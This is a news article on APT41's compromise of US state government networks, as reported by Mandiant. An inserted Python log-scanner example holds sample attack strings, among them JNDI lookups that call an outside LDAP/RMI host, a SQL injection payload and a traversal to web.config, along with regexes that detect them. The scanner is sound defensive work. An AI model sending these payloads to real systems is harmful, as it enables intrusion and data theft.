
China-backed hackers compromised six US government networks

Mandiant researchers investigated APT41 activities between May 2021 and February 2022

Chinese hackers belonging to the state-backed APT41 group compromised at least six US government networks by exploiting vulnerabilities in internet-facing applications. 

The vulnerabilities included a zero-day in the USAHerds application and the Log4Shell flaw in the ubiquitous Java logger Log4j, according to cyber security firm Mandiant, which was this week acquired by Google. The company responded to an APT41 intrusion targeting a US state government computer network in May 2021 and studied the group's activity until February 2022.

APT41 is a prolific Chinese state-sponsored espionage group known for targeting organisations in both the public and private sectors and for conducting financially motivated activity for personal gain.

Although the goals of APT41’s latest campaign remain unknown, Mandiant’s investigations revealed a variety of new techniques and malware variants used by the hackers.

During the period of investigation, Mandiant found that APT41 successfully compromised at least six US state government networks through the exploitation of vulnerable internet-facing web applications, often written in ASP.NET. In most of the compromises, APT41 carried out .NET deserialization attacks, although Mandiant also observed the group exploiting SQL injection and directory traversal vulnerabilities.

In one instance, APT41 gained access through an SQL injection vulnerability in a proprietary web application but Mandiant detected and contained the activity. However, two weeks later, APT41 re-compromised the network by exploiting a previously unknown zero-day vulnerability in a commercial-off-the-shelf (CoTS) application, USAHerds.

In two other instances, Mandiant began an investigation at one state agency only to find that APT41 had also compromised a separate, unrelated agency in the same state.

Mandiant added that the hacking group was quick to adapt and use publicly disclosed vulnerabilities to gain initial access into target networks, while also maintaining existing operations.

“On December 10th, 2021, the Apache Foundation released an advisory for a critical remote code execution (RCE) vulnerability in the commonly used logging framework Log4J,” wrote the researchers. “Within hours of the advisory, APT41 began exploiting the vulnerability to later compromise at least two US state governments as well as their more traditional targets in the insurance and telecommunications industries.”
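The article names the web-facing vectors APT41 used (SQL injection and directory traversal against ASP.NET applications, and from December 2021 the JNDI lookup strings that trigger Log4Shell) without showing what they look like in telemetry. The script below is an added example, not code from the article or from Mandiant: it parses web-server access-log lines in combined log format and flags requests carrying indicator strings for each of those three classes. The log lines, IP addresses and request paths are constructed for the example; a real deployment would feed it live logs and tune the patterns to the application.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article or Mandiant's report).
# Addresses are from the RFC 5737 documentation ranges; paths are invented.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Dec/2021:03:14:07 +0000] "GET /search?q=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Dec/2021:03:15:22 +0000] "GET /reports?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.12 - - [12/Dec/2021:03:16:01 +0000] "GET /download?file=..%2F..%2F..%2Fweb.config HTTP/1.1" 404 221 "-" "curl/7.79"
203.0.113.13 - - [12/Dec/2021:03:17:45 +0000] "GET /index.aspx HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.14 - - [12/Dec/2021:03:18:09 +0000] "GET /search?q=annual%20report HTTP/1.1" 200 2048 "-" "${jndi:rmi://198.51.100.7/x}"
"""

# Apache/nginx "combined" log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One indicator pattern per vulnerability class named in the article.
# These are deliberately simple; production rules need broader coverage.
INDICATORS = {
    # Log4Shell trigger: a JNDI lookup anywhere the application might log the value
    "jndi_lookup": re.compile(r"\$\{\s*jndi:", re.IGNORECASE),
    # Classic tautology / comment-terminator / stacked-statement SQL injection shapes
    "sql_injection": re.compile(
        r"('\s*(or|and)\s+\S+\s*=\s*\S+|--\s*$|;\s*(drop|union|select)\b)", re.IGNORECASE
    ),
    # Directory traversal with either path separator
    "directory_traversal": re.compile(r"(\.\./|\.\.\\)"),
}


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Payloads usually arrive percent-encoded; decode once before matching.
    rec["decoded_path"] = unquote(rec["path"])
    rec["decoded_ua"] = unquote(rec["ua"])
    return rec


def classify(rec):
    """Return the list of indicator names that fire on this record."""
    hits = []
    for name, pattern in INDICATORS.items():
        # Log4Shell fires on any logged field, so inspect headers as well as the path.
        for field in ("decoded_path", "decoded_ua", "referer"):
            if pattern.search(rec[field]):
                hits.append(name)
                break
    return hits


def scan(log_text):
    """Scan a block of log text; return (ip, raw_path, hits) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count these separately
        hits = classify(rec)
        if hits:
            findings.append((rec["ip"], rec["path"], hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits)}")
```

Two design points matter here: the request is URL-decoded before matching, because the traversal and SQL payloads in the sample arrive percent-encoded and would slip past a raw-string match; and the JNDI check runs over the User-Agent and Referer fields as well as the path, since Log4Shell triggers wherever the vulnerable logger records the string, not only in the URL.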

Mandiant said that in late February 2022, APT41 re-compromised two previous US state government victims. This closely aligns with APT41’s May-December 2021 activity, representing a continuation of their campaign into 2022 and demonstrating their unceasing desire to access state government networks, said the company. 

Mandiant underlined that the goals of the campaign are currently unknown, although it has observed evidence of APT41 exfiltrating Personal Identifiable Information (PII).

“Although the victimology and targeting of PII data is consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial gain,” stated the researchers.

Members of APT41 were charged by the US Department of Justice (DoJ) in September 2020 in connection with computer intrusion campaigns against over 100 victim companies.

The DoJ said these intrusions facilitated the theft of source code, software code-signing certificates, customer account data, and valuable business information. It added that the intrusions also facilitated the defendants’ other criminal schemes, such as ransomware and crypto-jacking.
